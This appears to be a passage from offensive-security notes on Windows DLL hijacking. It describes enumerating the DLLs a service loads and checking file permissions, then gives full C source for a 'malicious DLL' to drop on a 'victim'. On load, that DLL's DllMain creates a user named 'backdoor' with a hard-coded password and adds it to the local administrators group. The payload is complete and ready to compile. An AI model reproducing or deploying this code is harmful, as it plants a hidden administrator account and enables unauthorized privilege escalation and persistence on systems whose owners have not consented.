We can use Process Monitor, or any monitoring tool that is on the system to enumerate DLL's on a running service. We may have to import our own process monitor binary to system if there is none under permissions we can use!
NOTE: If the DLL list is empty, we should restart the service and view the start up DLLs.
Restarting DLL Service
PS> Restart-Service BetaService
Enumerating Permissions
Once we've enumerated the installed service and found one of interest, we can view the permissions. We can use tools like: icacls Windows utility or the PowerShell Cmdlet Get-ACL
MASK
PERMISSIONS
F
Full access
M
Modify access
RX
Read and execute access
R
Read-only access
W
Write-only access
Enumerating DLL's ProcessExplorer
If we have access to RDP, we can use SysInternals' ProcessExplorer to quickly find Dlls.
Download ProcessExplorer & ProcessMonitor to Victim
Launch Process Monitor and set a filter for result “NAME NOT FOUND”.
Create Malicious DLL
There are many types of malicios DLL's we can execute on our victim. For more information view: Malware Development
Adds Administrative User w/ Net Command
#include <stdlib.h>
#include <windows.h>
BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH: // A process is loading the DLL.
int i;
i = system ("net user backdoor password123! /add");
i = system ("net localgroup administrators backdoor /add");
break;
case DLL_THREAD_ATTACH: // A process is creating a new thread.
break;
case DLL_THREAD_DETACH: // A thread exits normally.
break;
case DLL_PROCESS_DETACH: // A process unloads the DLL.
break;
}
return TRUE;
}
